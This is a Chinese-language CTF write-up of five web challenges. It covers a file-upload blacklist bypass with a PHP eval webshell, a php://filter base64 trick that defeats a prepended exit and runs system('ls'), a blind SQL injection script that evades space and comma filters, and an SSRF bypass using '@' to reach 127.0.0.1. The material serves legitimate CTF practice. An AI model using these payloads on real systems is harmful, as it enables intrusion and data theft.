web的知识点比较单一,没有什么弯弯绕绕,一共五道题。
签到题:提示flag在源码中,审查元素,得到You are looking for this password: html_sourcecode,然后直接将html_sourcecode加上flag{}(一开始都没想到这里来。。。),提交。
easybypass:简单的文件上传漏洞。打开是文件上传,随便上传一个php文件,返回不能php后缀,看样子是黑名单,直接用pht绕过,一共有这些php2, php3, php4, php5, phps, pht, phtm, phtml。php文件内容<?php phpinfo();?>,上传,还返回了文件路径,访问,直接显示出php配置信息。接下来上传一句话<?php @eval($_POST['pass']);?>,菜刀连接,得到flag。
exit:打开页面直接显示源代码。大致意思是接收2个参数,在c参数前加上<?php exit;?>,然后将其写入我们filename文件里(这里一看就是tmp.php)。
<?php
show_source(__FILE__);
$c = "<?php exit;?>";
@$c.=$_GET['c'];
@$filename = $_GET['file'];
@file_put_contents($filename, $c);
highlight_file('tmp.php');
?>
所以问题就在于开头增加了exit过程,导致即使我们写入的命令无法执行。所以接下来可以使用base64编码绕过。
具体:我们可以将传递c参数进行base64编码,写入文件的内容就成了<?php exit;?>加上base64后的字符串,再写入时利用 php://filter协议进行解码,<?php exit;?>里面的字符<、?、;、>、空格不符合base64编码的字符范围将被忽略。所以最终被解码的字符仅有“phpexit”和我们传入的字符串。还有一点,因为base64算法解码时是4个byte一组,phpexit一共只有7个字符,所以给他增加1个字符‘a’,共8个字符。不然会吃掉我们一个字符。payload如下。
#传入的内容
<?php system('ls') ;?>
#编码后
PD9waHAgc3lzdGVtKCdscycpIDs/Pg==
#payload
?c=aPD9waHAgc3lzdGVtKCdscycpIDs/Pg==&file=php://filter/write=convert.base64-decode/resource=tmp.php
然后访问tmp.php文件,得到phpinfo123.php,访问它,搜索一下就能得到flag。
放篇大佬博客https://www.leavesongs.com/PENETRATION/php-filter-magic.html
sqli:一道sql注入,打开显示登录框,随便输入个admin/admin,进入到登录成功界面,不过里面什么都没有。返回到登录页面,先输个测试语句,admin' and 1=1#。可以看到返回,过滤了空格,后面测试还过滤了逗号。
用()可以绕过空格,用from 1 for 1绕过逗号。这里我们使用布尔盲注。简单测下数据库的长度,
然后上脚本,这里爆出字段后base64解码一下即可。
# !/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{},!@#$%^&*()_+-="
url = "http://172.19.184.202:29821/login.php"
//注意登录成功会返回的页面是I am admin! However, I cannot do anything. lol,随便选个
yes = "lol"
name = ""
for i in range(1, 100):
print(i)
for char in chars:
#爆库名:xman
#payload = "admin'and(ascii(substr(database()from(" + str(i) + ")for(1)))=" + str(ord(char)) + ")#"
#爆表名:ctf_flags,ctf_users
# payload = "admin'and(ascii(substr((select(group_concat(table_name))from(information_schema.tables)" \
# "where(table_schema=database()))from(" + str(i) + ")for(1)))=" + str(ord(char)) + ")#"
#爆列名:id,ggflag user表:id,rname,gpass,pinfo
# payload = "admin'and(ascii(substr((select(group_concat(column_name))from(information_schema.columns)" \
# "where(table_name='ctf_users'))from(" + str(i) + ")for(1)))=" + str(ord(char)) + ")#"
#爆字段:
payload = "admin'and(ascii(substr((select(group_concat(gpass))from(ctf_users))from(" + str(i) + ")for(1)))=" + str(ord(char)) + ")#"
data = {
"username": payload,
"password": "1",
"submit": "1"
}
res = requests.post(url, data=data).content.decode("utf-8")
if yes in res:
name += char
print(name)
break
ssrf1:ssrf简单解释下吧,是构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。
相当于,我们能访问一个web服务器,然后web服务器向内网服务器请求资源。我们就可以恶意构造这个请求。造成本地文件泄露,对内网进行扫描,得到有漏洞的信息。
访问页面。
就是想让我们读取到flag.php。
直接输入,flag.php,提示必须以本站域名开头,输入http://172.19.184.202:26778/flag.php,将base64解码,得到need local。说明它需要解析到本地才能访问。
使用@绕过,提交http://172.19.184.202:26778@127.0.0.1/flag.php,得到base64,解码得到flag。
